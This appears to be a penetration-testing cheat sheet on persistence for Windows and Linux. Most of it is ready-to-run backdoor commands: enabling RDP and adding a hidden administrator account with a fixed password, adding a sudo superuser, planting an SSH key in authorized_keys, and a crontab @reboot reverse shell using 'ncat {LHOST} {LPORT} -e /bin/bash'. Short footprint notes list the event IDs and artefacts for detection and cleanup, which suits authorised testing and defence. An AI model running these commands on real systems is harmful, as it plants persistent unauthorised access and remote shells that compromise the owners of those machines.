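# Persistence

## Windows

```
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
cmd /c net user /add Till P@ssw0rd
cmd /c net localgroup Administrators /Add Till
cmd /c net localgroup "Remote Desktop Users" /Add Till
rdesktop -k de-ch -u 'Till' -p 'P@ssw0rd' {RHOST}
```

Footprint, for detection and cleanup: `fDenyTSConnections` is set to 0 (Sysmon Event ID 13 where registry monitoring is configured), and the "remote desktop" firewall rule group is enabled. The account creation and the two group additions are logged as Security Event IDs 4720 and 4732 when account-management auditing is on. The password appears in process command-line logging (Event ID 4688) where that is enabled.

- persistence-info.github.io
- SharPersist
- PayloadsAllTheThings Windows Persistence

## Linux

### Add Super User

```
# Generate your own PW with: `openssl passwd -crypt 'P@ssw0rd'`
sudo useradd -p wNlg41ZQYB2nQ -s /bin/bash -d /home/till -m -G sudo till
```

### SSH Keys

```
# If you haven't done so already, prepare your ~/.ssh/id_rsa.pub on Kali:
ssh-keygen
# Generate the command to type into the target:
echo -e "echo '$(cat $HOME/.ssh/id_rsa.pub)' >> ~/.ssh/authorized_keys"
# Absolute Path: /home/{USER}/.ssh/authorized_keys
# Absolute Path: /root/.ssh/authorized_keys
# Maybe: echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && service sshd restart
# If ~/.ssh/authorized_keys doesn’t exist on target:
mkdir ~/.ssh
chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chown -R {USER}:{USER} /home/{USER}/.ssh/
# Use the key
ssh -i ~/.ssh/id_rsa {RUSER}@{RHOST}
```

### Crontab

```
(crontab -l ; echo "@reboot sleep 200 && ncat {LHOST} {LPORT} -e /bin/bash")|crontab 2> /dev/null
```

Footprint, for detection and cleanup: a new `till` entry in /etc/passwd and /etc/shadow with membership of the `sudo` group, an added line in the target account's `authorized_keys` (and possibly a `PermitRootLogin yes` line in /etc/ssh/sshd_config), and an `@reboot` line in the user's crontab, visible with `crontab -l`. `-crypt` produces a DES-crypt hash, which covers only the first eight characters of the password.

- PayloadsAllTheThings Linux Persistence

Relevant Note(s): Penetration Testing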